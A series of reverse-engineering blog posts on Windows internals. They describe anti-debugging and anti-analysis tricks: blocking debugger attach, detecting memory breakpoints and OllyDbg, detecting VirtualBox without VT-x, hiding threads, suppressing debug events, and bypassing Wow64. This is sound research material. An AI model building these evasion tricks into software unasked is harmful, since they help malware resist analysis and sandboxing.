From the image above, it is also easy to conclude that if we force the "RtlImageNtHeader" function to fail, we can prevent any foreign process, including the debugger, from attaching to our process. The easiest way to accomplish that is by erasing the PE header at runtime. Any call to ZwCreateThreadEx as part of calling the "DebugActiveProcess" function (used for attaching to a running process) would fail. For more information and examples, please refer to my previous post.

N.B. DebugActiveProcess calls DbgUiIssueRemoteBreakin, which calls "RtlCreateUserThread", which calls "ZwCreateThreadEx".

One may say, "Erasing the whole PE header may render many APIs which read from the PE header useless e.g. FindResource or GetProcAddress". My answer will be "Yes, you are right".

So, we should find a smarter way to do it.

Okay, let's continue disassembling the "RtlCreateUserStack" function.


As you can see in the image above, if the size of stack commit argument passed to it is zero, it takes the value of the "SizeOfStackCommit" field from the PE header. The same measure is taken if the size of stack reserve passed is zero. It is also noteworthy that if both the size of stack commit argument passed and "SizeOfStackCommit" of the PE header are zero, the commit size becomes 0x4000 (the default commit size is 0x4000).

The function then checks the size of stack commit against the size of stack reserve. If the size of stack commit happens to be greater, then the size of stack reserve is adjusted to be greater.

The function then ensures that the size to be committed is not less than the "MinimumStackCommit" field of the process's PEB. If it is less, the size to be committed is adjusted.
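
Put together, the size selection described in the last three paragraphs looks roughly like the sketch below. It follows the prose only; in particular, rounding the reserve up to a multiple of 1 MB when the commit size is greater is my assumption, since the exact adjustment is not spelled out here.

```python
DEFAULT_COMMIT = 0x4000
ONE_MB = 0x100000


def effective_stack_sizes(commit, reserve, header_commit, header_reserve, minimum_commit):
    """Return (commit, reserve) after the adjustments described in the text.

    commit/reserve are the caller's arguments, header_* are SizeOfStackCommit
    and SizeOfStackReserve, minimum_commit is the PEB's MinimumStackCommit.
    """
    if commit == 0:
        commit = header_commit or DEFAULT_COMMIT
    if reserve == 0:
        reserve = header_reserve
    if commit > reserve:
        # Assumption: the reserve grows to the commit size rounded up to 1 MB.
        reserve = (commit + ONE_MB - 1) // ONE_MB * ONE_MB
    if commit < minimum_commit:
        commit = minimum_commit
    return commit, reserve


# A thread created with dwStackSize = 0 in a process whose header says 1 MB.
print([hex(v) for v in effective_stack_sizes(0, 0, 0, 0x100000, 0)])
# The same call after the header's SizeOfStackReserve was made huge.
print([hex(v) for v in effective_stack_sizes(0, 0, 0, 0xFFFFF000, 0)])
```

The second result is the interesting one: the caller passed nothing unusual, yet the reserve size comes straight from the target's PE header.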


The function then calls the "ZwSetInformationProcess" function with the "ProcessInformationClass" parameter set to 0x29 (ProcessThreadStackAllocation). The size to be reserved is passed in the 4th member of the structure passed in the "ProcessInformation" parameter.

Now let's quickly have a look at the "NtSetInformationProcess" function.

As you can see in the two images above, the value of the 4th member of the structure passed to the "ZwSetInformationProcess" function is used as the "RegionSize" parameter passed to the "ZwAllocateVirtualMemory" function.

Given this knowledge, if we change the value of the "SizeOfStackReserve" field of the PE header to a huge value at runtime, then we can cause the "ZwAllocateVirtualMemory", "ZwSetInformationProcess", "RtlCreateUserStack", "PspAllocateThread", "PspCreateThread", and "NtCreateThreadEx" functions to fail in turn, preventing any foreign processes, including debuggers, from creating any thread in our process.
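
As a rough illustration of the patch itself, the sketch below locates "SizeOfStackReserve" in a header buffer and overwrites it. The offsets come from the documented PE layout (offset 72 of the optional header, 4 bytes for PE32 and 8 bytes for PE32+); the function names, the stub header and the value 0xFFFFF000 are hypothetical, and this is not the source of the demo.

```python
import struct

STACK_RESERVE_OFFSET = 72                   # SizeOfStackReserve in the optional header
FIELD_FORMATS = {0x10B: "<I", 0x20B: "<Q"}  # PE32 / PE32+ magic -> field width


def stack_reserve_field(image):
    """Return (offset, struct format) of SizeOfStackReserve in a PE header."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    optional_header = e_lfanew + 4 + 20     # signature + IMAGE_FILE_HEADER
    magic = struct.unpack_from("<H", image, optional_header)[0]
    if magic not in FIELD_FORMATS:
        raise ValueError("unknown optional header magic")
    return optional_header + STACK_RESERVE_OFFSET, FIELD_FORMATS[magic]


def get_stack_reserve(image) -> int:
    offset, fmt = stack_reserve_field(image)
    return struct.unpack_from(fmt, image, offset)[0]


def set_stack_reserve(image: bytearray, value: int) -> None:
    offset, fmt = stack_reserve_field(image)
    struct.pack_into(fmt, image, offset, value)


def make_stub_header(reserve: int) -> bytearray:
    """Hypothetical helper: a PE32 header-only buffer for the demo."""
    image = bytearray(0x200)
    struct.pack_into("<I", image, 0x3C, 0x80)        # e_lfanew
    image[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", image, 0x80 + 24, 0x10B)  # PE32 magic
    set_stack_reserve(image, reserve)
    return image


header = make_stub_header(0x100000)
set_stack_reserve(header, 0xFFFFF000)  # a size no allocation will satisfy
print(hex(get_stack_reserve(header)))
```

In a running process the same field lives in the header mapped at the image base, and that page would first have to be made writable.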

A demo can be found here and its source code from here.

Any comments or ideas are more than welcome.


Defeating Memory Breakpoints

In this post I will show you a couple of tricks that can be used to defeat memory breakpoints. First I should explain what memory breakpoints are and how they work.

Anyone who has spent some time in the field of software protection and debuggers must have heard of Memory breakpoints. Actually, memory breakpoints were not extensively used in the past but since more and more protection schemes implement anti-INT3 and anti-Hardware breakpoints tricks, reverse engineers started to use memory breakpoints to avoid detection.

The idea of memory breakpoints is simple. Imagine that we want to place a memory breakpoint at address 0x402005 (On-Execution). What the debugger theoretically does is as follows:

1) Marks the memory page which the address 0x402005 belongs to (page 0x402000) as guarded via calling the "VirtualProtectEx" or "ZwProtectVirtualMemory" function with the "flNewProtect" parameter having the "PAGE_GUARD" protection attribute set. In this case page 0x402000 is originally PAGE_EXECUTE_READ 0x20 and after placing the memory breakpoint it becomes PAGE_EXECUTE_READ|PAGE_GUARD 0x120.

2) Each time the guarded page is touched, whether it is read from, written to, or executed, a STATUS_GUARD_PAGE_VIOLATION (0x80000001) exception is raised and the debugger receives a debug event of type EXCEPTION_DEBUG_EVENT.

3) The debugger then inspects various fields in the "EXCEPTION_RECORD" structure of the "DEBUG_EVENT" structure to determine the reason why the exception was raised.
If the following conditions are met, then the debugger figures out that the instruction at 0x402005 is about to execute, i.e. the breakpoint is reached and it should break accordingly.
a) The "ExceptionCode" field is set to STATUS_GUARD_PAGE_VIOLATION 0x80000001.
b) The "NumberParameters" field is greater than or equal to 2.
c) The "ExceptionInformation[0]" field is set to 8.
d) The "ExceptionInformation[1]" field is set to 0x402005.
The image below represents something very similar.


If any of the above-mentioned conditions is not met, then the debugger figures out it is not the breakpoint. Whether the breakpoint is hit or not, the debugger sets the "PAGE_GUARD" protection attribute again, since the system removes it from the page once the exception has been raised.
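
The conventional scheme described above can be summarized in a short sketch. It only models the decision the debugger makes; the function names are mine, and the exception fields are passed in as plain values instead of a real "EXCEPTION_RECORD".

```python
STATUS_GUARD_PAGE_VIOLATION = 0x80000001
PAGE_SIZE = 0x1000
PAGE_EXECUTE_READ = 0x20
PAGE_GUARD = 0x100
ACCESS_EXECUTE = 8  # value of ExceptionInformation[0] for an execution attempt


def page_base(address: int) -> int:
    """Base address of the page an address belongs to."""
    return address & ~(PAGE_SIZE - 1)


def is_breakpoint_hit(exception_code: int, information, breakpoint_address: int) -> bool:
    """Apply conditions a) to d) to the fields of an exception record.

    information stands for the ExceptionInformation array; its length plays
    the role of NumberParameters.
    """
    return (
        exception_code == STATUS_GUARD_PAGE_VIOLATION
        and len(information) >= 2
        and information[0] == ACCESS_EXECUTE
        and information[1] == breakpoint_address
    )


print(hex(page_base(0x402005)), hex(PAGE_EXECUTE_READ | PAGE_GUARD))
print(is_breakpoint_hit(STATUS_GUARD_PAGE_VIOLATION, [8, 0x402005], 0x402005))
print(is_breakpoint_hit(STATUS_GUARD_PAGE_VIOLATION, [0, 0x402005], 0x402005))
```

The last call models a plain read of the guarded page: the exception is the same, but the debugger silently guards the page again and continues.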

Surprisingly, even though this is the typical way debuggers should implement memory breakpoints, OllyDbg and many other user-mode debuggers implement memory breakpoints in a slightly different way.

Let's first take OllyDbg v1.10 and see how it implements memory breakpoints.

If you already use OllyDbg v1.10, you should already know that it has only two kinds of memory breakpoints, On-Access and On-Write. On-Access memory breakpoints trigger anytime the page is touched and On-Write memory breakpoints trigger anytime the page is written to.

Reversing OllyDbg v1.10 to see how it implements each type, I found out that:

1) On-Access memory breakpoints are implemented by marking the page that the breakpoint address belongs to as PAGE_NOACCESS. PAGE_NOACCESS means that any time the page is touched, a STATUS_ACCESS_VIOLATION exception is raised. The debugger then receives the debug event and inspects fields in the "EXCEPTION_RECORD" structure in a similar way to the conventional method mentioned above.

2) On-Write memory breakpoints are implemented by removing write access from the page that the breakpoint address belongs to: the "flNewProtect" parameter passed to the "VirtualProtectEx" function is set to PAGE_EXECUTE_READ. Every time the page is written to, a STATUS_ACCESS_VIOLATION exception is raised. The debugger then receives the debug event and inspects fields in the "EXCEPTION_RECORD" structure in a similar way to the conventional method mentioned above. Here lies a bug in OllyDbg v1.10: it assumes that the memory protection of any page in the process address space can be changed to PAGE_EXECUTE_READ, which is not true. For example, the memory page at 0x10000 can never be made executable (Windows 7).
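
The two OllyDbg v1.10 breakpoint types can be modelled roughly as below. This is only a sketch of the behaviour described above, not code recovered from OllyDbg: the enum, the function names and the range check are assumptions, and the constants are redefined locally with their Windows values.

```c
#include <stdbool.h>
#include <stdint.h>

/* Windows values, redefined locally so the sketch builds anywhere. */
#define STATUS_ACCESS_VIOLATION 0xC0000005u
#define PAGE_NOACCESS           0x01u
#define PAGE_EXECUTE_READ       0x20u

typedef enum { BP_ON_ACCESS, BP_ON_WRITE } MemBpKind;  /* hypothetical names */

/* Protection the debugger applies to the page for each breakpoint type. */
uint32_t protection_for(MemBpKind kind)
{
    return kind == BP_ON_ACCESS ? PAGE_NOACCESS : PAGE_EXECUTE_READ;
}

/* access_type is ExceptionInformation[0] (0 read, 1 write, 8 execute),
   fault_address is ExceptionInformation[1]. The breakpoint covers
   [bp_start, bp_start + bp_size). */
bool mem_bp_hit(MemBpKind kind, uint32_t code, uintptr_t access_type,
                uintptr_t fault_address, uintptr_t bp_start, uintptr_t bp_size)
{
    if (code != STATUS_ACCESS_VIOLATION)
        return false;
    if (fault_address < bp_start || fault_address - bp_start >= bp_size)
        return false;               /* same page, but outside the breakpoint */
    return kind == BP_ON_ACCESS || access_type == 1;
}
```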

Now that we have seen how memory breakpoints are implemented, I will show you two tricks that can be used as anti-memory-breakpoints.

Trick 1)

Given the knowledge above, we can conclude that in order to defeat memory breakpoints, especially those of type On-Execution, we should cause the "VirtualProtectEx" function to fail. How is that possible?
By copying our code to a dynamically allocated memory page that can be made executable but at the same time cannot be made guarded or no-access. Such memory pages do exist. For every thread you create, the kernel allocates one page (three pages in the case of Wow64 processes) for the TEB. The TEB page(s) can't be made non-writable and can't be assigned the "PAGE_GUARD" protection attribute. How can this be implemented?
All you have to do is call the "CreateThread" function with the "dwCreationFlags" parameter set to CREATE_SUSPENDED. At this point, we have the new thread's TEB with the page protection set to PAGE_READWRITE. The next step is to make the TEB page executable by calling the "VirtualProtect" function with the "flNewProtect" parameter set to PAGE_EXECUTE_READWRITE.

You can use this demo to test this trick.

N.B. For a stealthier way to conceal the point at which the page protection is changed to executable, use the "VirtualAlloc" function instead of "VirtualProtect". The allocation type in this case must be MEM_COMMIT only.

Trick 2)

This trick can easily detect memory breakpoints. It relies on the fact that the "ReadProcessMemory" function returns false if you try to read guarded or no-access memory. To use this trick, all you have to do is call the "ReadProcessMemory" function with the "hProcess" parameter set to 0xFFFFFFFF (the current-process pseudo-handle), the "lpBaseAddress" parameter set to the image base, and the "nSize" parameter set to the size of the image. If it returns false, then at least one memory breakpoint is present.

You can use this demo to test this trick.

N.B. Certain executables contain gaps of inaccessible pages, e.g. the pages intended for anti-dumping described in a previous post. You have to take care of that when implementing this trick.

N.B. ReadProcessMemory has also been used as a stealthy way to read memory without triggering Hardware Breakpoints.


Any comments or ideas are very welcome.

You can follow me on Twitter @waleedassar





OllyDbg RaiseException Bug

In this post I will show you a bug in OllyDbg that can be used to detect its presence. The trick is simple: all you have to do is call the "RaiseException" function with the "dwExceptionCode" parameter set to EXCEPTION_BREAKPOINT 0x80000003. The response depends on the OllyDbg version used. In v1.10, the exception is silently swallowed by the debugger and the registered exception handler is not called. In v2.01 (alpha 4), several message boxes pop up and the exception handler is not called either. Only v2.01 (beta 2) is immune to this bug.



The reason behind this bug is that OllyDbg tries to read the x86 instruction pointed to by the "ExceptionAddress" field of the "EXCEPTION_RECORD" structure to ensure it is 0xCC or 0x03. For EXCEPTION_BREAKPOINT exceptions raised by explicitly calling the "RaiseException" function, the instruction at ExceptionAddress is definitely not 0xCC or 0x03.


You can find a demo here and its source code from here.

Any comments or ideas are very welcome.

You can follow me on Twitter @waleedassar

VirtualBox CPUID Discrepancy

In this post I will show you a weird issue I have recently found in VirtualBox. This issue is seen only if VirtualBox is running without hardware virtualization support (VT-x/AMD-V).

For example, when Windows XP is running in VirtualBox with no hardware virtualization support, it is forced to use INT 2E to make system calls instead of SYSENTER. This is because SYSENTER is apparently not supported by VirtualBox. The problem is that in this case the CPUID instruction still reports the SYSENTER/SYSEXIT instructions as supported.

We can use this discrepancy to detect VirtualBox (only if running with no hardware virtualization). All we have to do is execute CPUID (leaf 1) and, if bit 11 of EDX (mask 0x800, the SEP flag) is set, execute SYSENTER in the form of any system call, e.g. ZwDelayExecution. If an EXCEPTION_ILLEGAL_INSTRUCTION 0xC000001D is raised, then VirtualBox is present.
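
The decision logic of this check can be sketched as follows. It is a portable model only: the caller is assumed to have already executed CPUID leaf 1 and attempted a SYSENTER-based system call under an exception handler, and both function names and the "0 means no exception" convention are hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

#define CPUID1_EDX_SEP                (1u << 11)   /* mask 0x800: SYSENTER/SYSEXIT supported */
#define EXCEPTION_ILLEGAL_INSTRUCTION 0xC000001Du  /* Windows value, redefined locally */

/* edx_leaf1: value of EDX after CPUID with EAX = 1. */
bool cpuid_reports_sysenter(uint32_t edx_leaf1)
{
    return (edx_leaf1 & CPUID1_EDX_SEP) != 0;
}

/* sysenter_exception: exception code caught while issuing a system call
   through SYSENTER, or 0 if the call completed normally (assumed convention). */
bool looks_like_virtualbox_without_vtx(uint32_t edx_leaf1, uint32_t sysenter_exception)
{
    return cpuid_reports_sysenter(edx_leaf1)
        && sysenter_exception == EXCEPTION_ILLEGAL_INSTRUCTION;
}
```

The discrepancy only counts when both halves disagree: CPUID advertises SEP, yet executing SYSENTER faults.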


You can find a demo here and source code from here.

Any comments or ideas are very welcome.

You can follow me on Twitter @waleedassar

Hiding Threads From Debuggers

In this post I will discuss an old anti-debug trick that many of us know well. The trick is the ability of our code to hide specific threads from debuggers. This is usually achieved by calling the ntdll "ZwSetInformationThread" function with the "ThreadInformationClass" parameter set to ThreadHideFromDebugger 0x11. Sample code for this trick can be found here.

If we look at the "ZwSetInformationThread" function in disassembly, we can easily see that the "ThreadInformationLength" parameter must be zero for the function call to succeed, otherwise ERROR_BAD_LENGTH is returned. See image below.

And here is the 64-bit version

As you can see from the two images above, the whole function call ends up setting the "HideFromDebugger" bit of the "_ETHREAD" structure. Once this flag has been set, the kernel guarantees that the debugger will never receive any debug events from the corresponding thread.

For example, let's take the LOAD_DLL_DEBUG_EVENT events. As you know, any time a module is loaded into the address space of a specific process, the debugger is notified of this action through a LOAD_DLL_DEBUG_EVENT event. The debugger then inspects various interesting fields in the "LOAD_DLL_DEBUG_INFO" structure e.g. ImageBase. Depending on the debugger configuration, the debugger notifies you of that or not. You can see this if you instruct OllyDbg to break on new module.

The two images above show how OllyDbg acts if a normal (not hidden) thread loads a new DLL. It is as follows:
1) The thread loads a new DLL by calling e.g. the "LoadLibrary" function.

2) The "LoadLibrary" function wraps a call to the ntdll "ZwMapViewOfSection" function.

3) The kernel mode part of ZwMapViewOfSection calls the "DbgkMapViewOfSection" function.

4) The "DbgkMapViewOfSection" function queries both the "HideFromDebugger" bit of the "_ETHREAD" structure and the value of the "DebugPort" field of the "_EPROCESS" structure. If the "HideFromDebugger" bit is not set and the "DebugPort" field is set, then the function builds the "LOAD_DLL_DEBUG_INFO" structure and calls the "DbgkpSendApiMessage" function which is responsible for delivering the debug event to the attached debugger.
On the other hand, if the "HideFromDebugger" bit is set, DbgkMapViewOfSection returns immediately without delivering the debug event. See images below.


N.B. Regarding the LOAD_DLL_DEBUG_EVENT and UNLOAD_DLL_DEBUG_EVENT events, there are other factors that determine whether or not the debug event is delivered to the debugger, e.g. the "SuppressDebugMsg" bit of the Thread Environment Block (TEB).

5) In the debugger, the "WaitForDebugEvent" function returns with the "dwDebugEventCode" field set to LOAD_DLL_DEBUG_EVENT 0x6. Given this, the debugger figures out that a new module has just been loaded and that it should inspect the "LOAD_DLL_DEBUG_INFO" structure to extract the new image base, file handle, etc.

6) After extracting info. from the "LOAD_DLL_DEBUG_INFO" structure, the debugger calls the "ContinueDebugEvent" function to continue executing the thread.
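
The kernel-side decision in step 4 can be modelled as below. This is a simplified sketch based only on the description above, not on decompiled kernel code; the two structures keep just the fields mentioned in the text and the function name is hypothetical.

```c
#include <stdbool.h>
#include <stddef.h>

/* Minimal stand-ins for _ETHREAD and _EPROCESS (only the fields discussed). */
typedef struct { bool HideFromDebugger; } EthreadModel;
typedef struct { const void *DebugPort; } EprocessModel;

/* True when a LOAD_DLL_DEBUG_EVENT would be built and sent to the debugger. */
bool load_dll_event_is_sent(const EthreadModel *thread, const EprocessModel *process)
{
    if (thread->HideFromDebugger)
        return false;               /* hidden thread: return immediately */
    if (process->DebugPort == NULL)
        return false;               /* no debugger attached */
    return true;                    /* the event is delivered to the debugger */
}
```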

Similar to LOAD_DLL_DEBUG_EVENT events, debuggers never get notified of exceptions raised in the scope of hidden threads. To confirm that, let's have a look at the "DbgkForwardException" function.

As you can see in the image above, the "HideFromDebugger" bit of the "_ETHREAD" structure is queried here as well.

Conclusion: When the "HideFromDebugger" bit flag of the "_ETHREAD" structure is set, the debugger will not receive any debug events from that thread.

If we look again at the "NtSetInformationThread" function in disassembly, we will see that the function call is one-way, i.e. you can make this call to hide the thread from debuggers but you cannot make it to un-hide the thread.

Let's have a look at the "ZwQueryInformationThread" function. As the name implies, we can use this function to determine if a specific thread is hidden from debuggers. See below.

And here is the 64-bit version.

As you can see from the two images above, the "ThreadInformationLength" parameter must be one for this function call to succeed. If it is one as expected, nothing surprising happens: the function just sets the first byte pointed to by the "ThreadInformation" parameter to one if the "HideFromDebugger" bit of the "_ETHREAD" structure is set. Given this knowledge, I have created a small OllyDbg v1.10 plugin to detect any hidden threads in the process being debugged, especially when attaching to an active process. The plugin is called HiddenThreads. You can download it from here and its source code from here.

Unfortunately, in older versions of Windows e.g. XP, the "ZwQueryInformationThread" function can't be used to detect if a thread is hidden from debuggers as the ThreadHideFromDebugger information class 0x11 is simply not implemented. The function call returns ERROR_INVALID_PARAMETER.
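
The set and query semantics described so far (length 0 to set, length 1 to query, no way to clear the bit) can be summarised in a small model. The status enum, structure and function names are hypothetical; the real calls return NTSTATUS codes and operate on the kernel "_ETHREAD" structure.

```c
#include <stdbool.h>
#include <stdint.h>

typedef enum { MODEL_OK, MODEL_BAD_LENGTH } ModelStatus;   /* hypothetical statuses */
typedef struct { bool HideFromDebugger; } EthreadModel;    /* stand-in for _ETHREAD */

/* Models ZwSetInformationThread(ThreadHideFromDebugger): length must be 0. */
ModelStatus model_set_hide(EthreadModel *thread, uint32_t length)
{
    if (length != 0)
        return MODEL_BAD_LENGTH;
    thread->HideFromDebugger = true;    /* one-way: nothing ever clears it */
    return MODEL_OK;
}

/* Models ZwQueryInformationThread(ThreadHideFromDebugger): length must be 1. */
ModelStatus model_query_hide(const EthreadModel *thread, uint8_t *out, uint32_t length)
{
    if (length != 1)
        return MODEL_BAD_LENGTH;
    *out = thread->HideFromDebugger ? 1 : 0;
    return MODEL_OK;
}
```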

Now that we have seen how to hide a thread from debuggers, how this works under the hood, and how to detect if a thread is hidden from debuggers, let's try to find another way to hide the thread other than calling the "ZwSetInformationThread" function.

With the introduction of the "ZwCreateThreadEx" function in later versions of Windows, e.g. Windows Vista and 7, a new flags parameter is available. It allows new threads to be created hidden from debuggers, i.e. you don't need to call the "ZwSetInformationThread" function. If we set this parameter (the 7th parameter) to 0x4, the new thread will be hidden from debuggers. In this case, the "HideFromDebugger" bit is set in the "PspAllocateThread" function. See image below.


You can find a demo here and its source code from here.


This post was written based on debugging sessions on Windows 7 64-bit. This is why you see me switching from x86 to x64.

Any comments or ideas are very welcome.

You can follow me on Twitter @waleedassar

SuppressDebugMsg As Anti-Debug Trick

In this post I will show you a new anti-debug trick that affects many debuggers e.g. WinDbg and IDA Debugger.

When you load a module into the address space of a process, usually by calling e.g. the kernel32 "LoadLibrary" function, the debugger is notified of this through the LOAD_DLL_DEBUG_EVENT event. This occurs at the point where the "NtMapViewOfSection" function calls the "DbgkMapViewOfSection" function.

As we saw in the previous post, the "HideFromDebugger" flag of the "_ETHREAD" structure and the "DebugPort" field of the "_EPROCESS" structure are queried. If the "HideFromDebugger" flag is not set and the "DebugPort" field is set, the debug event is delivered to the debugger but only after the return value of the "DbgkpSuppressDbgMsg" function is checked.

If the "DbgkpSuppressDbgMsg" function returns false, the debug event is delivered to the debugger and vice versa. Now let's see the "DbgkpSuppressDbgMsg" function in disassembly.


As you can see in the image below, it checks the "SuppressDebugMsg" flag of the 64-bit TEB of the thread. If it is set, the function returns true and the debug event is not delivered to the debugger.

Also, the "SuppressDebugMsg" field of the 32-bit TEB is queried, if the "Wow64Process" field of the "_EPROCESS" structure is set.
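
The check performed by "DbgkpSuppressDbgMsg", as described above, can be sketched like this. It is a model of the prose only: "TebModel" keeps a single field, and passing NULL for the 32-bit TEB to mean "not a Wow64 process" is an assumption of this sketch.

```c
#include <stdbool.h>
#include <stddef.h>

/* Stand-in for a TEB: only the flag of interest. */
typedef struct { bool SuppressDebugMsg; } TebModel;

/* teb64: the thread's native TEB.
   teb32: the thread's 32-bit TEB, or NULL when the "Wow64Process" field of
   "_EPROCESS" is not set (assumed convention for this sketch).
   Returns true when the debug event must NOT be delivered. */
bool model_suppress_dbg_msg(const TebModel *teb64, const TebModel *teb32)
{
    if (teb64->SuppressDebugMsg)
        return true;
    if (teb32 != NULL && teb32->SuppressDebugMsg)
        return true;
    return false;
}
```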

Notes:
1) Each Wow64 process has two Process Environment Blocks (PEBs), a 64-bit one and a 32-bit one.

2) Each thread in a Wow64 process has two Thread Environment Blocks (TEBs), a 64-bit one and a 32-bit one. The 64-bit TEB is two pages in size and the 32-bit TEB is one page. The 32-bit TEB always follows the 64-bit TEB.

3) If the "Wow64Process" field of the "_EPROCESS" structure is set, then it is a Wow64 process (32-bit process running on 64-bit system). This field holds the address of the process's 32-bit PEB.

In WinDbg and IDA debugger, if our process loads a module e.g. walied.dll by calling e.g. the "LoadLibrary" function, the debugger receives the LOAD_DLL_DEBUG_EVENT event and caches the "hFile" field of the "LOAD_DLL_DEBUG_INFO" structure. It uses the "hFile" handle to read information, e.g. debug info, from walied.dll.

The problem here is that WinDbg and IDA debugger don't call CloseHandle(hFile) until the UNLOAD_DLL_DEBUG_EVENT event for walied.dll is received. So, if we set the "SuppressDebugMsg" bit of the TEB and then unload walied.dll by calling FreeLibrary, the debugger will not receive the UNLOAD_DLL_DEBUG_EVENT for walied.dll. Any subsequent attempt to acquire exclusive access to walied.dll by calling the "CreateFile" function will fail, which is a clear sign of a debugger's presence.

A demo can be found here and its source code from here.

The trick mentioned above affects WinDbg and IDA debugger. OllyDbg v1.10 is affected but in a slightly different way: it does not call CloseHandle(hFile) even if the corresponding UNLOAD_DLL_DEBUG_EVENT event is received.

N.B. OllyDbg v2.x is not affected since it closes the "hFile" handle of the "LOAD_DLL_DEBUG_INFO" structure immediately after it receives the LOAD_DLL_DEBUG_EVENT event.

Conclusion:
Setting the "SuppressDebugMsg" bit of a thread's TEB prevents the attached debugger from receiving LOAD_DLL_DEBUG_EVENT and UNLOAD_DLL_DEBUG_EVENT events from this thread.

For debuggers to be immune to this trick, they should use the "hFile" handle to read the information they need and then close it immediately.

Any comments or ideas are very welcome.

You can follow me on Twitter @waleedassar

Windows Internals: SkipThreadAttach

In this post I will not present any new tricks; instead I will discuss a new issue introduced in later versions of Windows regarding thread creation.
In a previous post, I briefly explained the ntdll "NtCreateThreadEx" function and its flag HideFromDebugger 0x4, which when passed to the function causes the new thread to be created hidden from debuggers.

In this post we will see another interesting flag that I prefer to call SuppressDllMains 0x2. Let's see this in disassembly.

As we can see in the image above, the "PspAllocateThread" function inspects the "Flags" parameter. If the SuppressDllMains 0x2 flag is set, then the function sets the "SkipThreadAttach 0x8" bit flag in the new thread's TEB.

The same holds for the 64-bit version of the function: if the "SuppressDllMains" flag is passed, the "SkipThreadAttach 0x8" bit flag is set in both the 32-bit TEB and the 64-bit TEB of the new thread.

N.B. The bit flags are at offset 0xFCA in 32-bit TEB's and at offset 0x17EE in 64-bit TEB's.
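
The effect of the two "NtCreateThreadEx" flags discussed so far can be sketched as a small model. It follows the description of "PspAllocateThread" given in these posts rather than the actual kernel code; the structure, the "TebFlags" field name and the function name are hypothetical, and "SuppressDllMains" is the author's own name for flag 0x2.

```c
#include <stdbool.h>
#include <stdint.h>

#define CREATE_FLAG_SUPPRESS_DLLMAINS  0x2u  /* author's name for the flag */
#define CREATE_FLAG_HIDE_FROM_DEBUGGER 0x4u
#define TEB_FLAG_SKIP_THREAD_ATTACH    0x8u  /* bit in the TEB flags word */

/* State of a freshly created thread, reduced to the two bits of interest. */
typedef struct {
    bool     HideFromDebugger;  /* lives in _ETHREAD */
    uint16_t TebFlags;          /* flags word in the TEB (hypothetical field name) */
} NewThreadModel;

NewThreadModel model_allocate_thread(uint32_t create_flags)
{
    NewThreadModel t = { false, 0 };
    if (create_flags & CREATE_FLAG_HIDE_FROM_DEBUGGER)
        t.HideFromDebugger = true;
    if (create_flags & CREATE_FLAG_SUPPRESS_DLLMAINS)
        t.TebFlags |= TEB_FLAG_SKIP_THREAD_ATTACH;
    return t;
}
```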

Now let's see what the "SkipThreadAttach" bit flag does. To track this, we will have to shift to user-mode.

In OllyDbg, search for the "\xCA\x0F" (0xFCA) in ntdll.dll and see which functions make use of the "SkipThreadAttach 0x8" bit flag.

The ntdll "RtlIsCurrentThreadAttachExempt" function was among the results I found.
This function returns false if the "SkipThreadAttach" bit flag is not set.
If the "SkipThreadAttach" bit flag is set, another bit flag, "RanProcessInit 0x20", is tested. If it is not set, the function returns true. Otherwise, the function returns false. In C code it looks something like below.
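
A minimal C sketch of the logic just described. The function name is illustrative and the flags word is passed in as a parameter so the snippet builds anywhere; the real function reads it from the current thread's TEB.

```c
#include <stdbool.h>
#include <stdint.h>

#define SKIP_THREAD_ATTACH 0x08u
#define RAN_PROCESS_INIT   0x20u

/* teb_flags: the bit-flags word of the current thread's TEB. */
bool is_thread_attach_exempt(uint16_t teb_flags)
{
    if (!(teb_flags & SKIP_THREAD_ATTACH))
        return false;               /* flag not set: never exempt */
    if (!(teb_flags & RAN_PROCESS_INIT))
        return true;                /* set, and process init has not run */
    return false;
}
```

In other words, a thread is exempt only when "SkipThreadAttach" is set and "RanProcessInit" is clear.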

Searching for all references to the "RtlIsCurrentThreadAttachExempt" function, I found one interesting place in ntdll.dll where this function is called, namely LdrpInitializeThread.

The "LdrpInitializeThread" function is responsible for calling the DllMains of loaded DLLs (and TLS callbacks as well) each time a thread is initializing (with the "fdwReason" parameter set to DLL_THREAD_ATTACH) or is exiting (with the "fdwReason" parameter set to DLL_THREAD_DETACH).

Looking at the "LdrpInitializeThread" function in disassembly, we can see that if the ntdll "RtlIsCurrentThreadAttachExempt" function returns true, e.g. due to the "NtCreateThreadEx" function being called with the "Flags" parameter set to SuppressDllMains 0x2, the DllMains and TLS callbacks of loaded modules will not be called in the context of the new thread. See image below.


A good example for this is the "DbgUiIssueRemoteBreakin" function in ntdll.dll of Windows 7. This function is called by the "DebugActiveProcess" function to create the attaching thread in the context of the process to be debugged.
In Windows XP, the thread created by the "DbgUiIssueRemoteBreakin" function caused the DllMains and TLS callbacks of loaded modules to be called, presenting another layer of protection against attaching.
In Windows 7, since the "DbgUiIssueRemoteBreakin" function ends up calling the "NtCreateThreadEx" function with the "Flags" parameter set to 0x2 (SuppressDllMains), no DllMain's or TLS callbacks are called for the debugger thread.

You can download the demo of this post from here and source code from here.

You can follow me on Twitter @waleedassar

Any comments or ideas are very welcome.

Call64, Bypassing Wow64 Emulation Layer

In this post I will discuss a piece of code that I wrote to ease the process of issuing 64-bit system calls without passing through the Wow64 emulation layer implemented in Wow64cpu.dll, Wow64.dll, and Wow64win.dll.


I implemented it in a function called "Call64()". Since some arguments in 64-bit system calls are 64 bits long, the "Call64()" function expects its arguments in the form of pointers to LARGE_INTEGER structures. Also, the return value is in the form of a pointer to a LARGE_INTEGER structure.


Let's take the implementation of this function step by step.

The first argument Call64 takes is a pointer to a LARGE_INTEGER structure which will receive the return value (RAX) of this system call. It is the caller's responsibility to allocate this structure. Also, it is the caller's responsibility to type-cast the value returned in it.

The second argument the function takes is the system call number or ordinal, e.g. the "ZwWaitForSingleObject" function in Windows 7 has a system call number of 0x1.

This argument is later used to formulate the shellcode used to issue the 64-bit system call.


Since this function is supposed to make 64-bit system calls with different numbers of arguments, it is implemented as a variadic function (a function with an indefinite number of arguments), with the third argument being the number of arguments the system call expects. The remaining arguments are all pointers to LARGE_INTEGER structures.

The function prototype is like below:

Now that we have seen what the arguments look like, let's see how the function works.

First, given the number of arguments, it calculates the stack space needed and commits it using the "_alloca" function. The newly allocated stack space is initialized to zero.

The function takes the first four arguments and stores them in RCX, RDX, R8, and R9 respectively. Extra arguments are stored on stack. Also, shadow space is taken care of.
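
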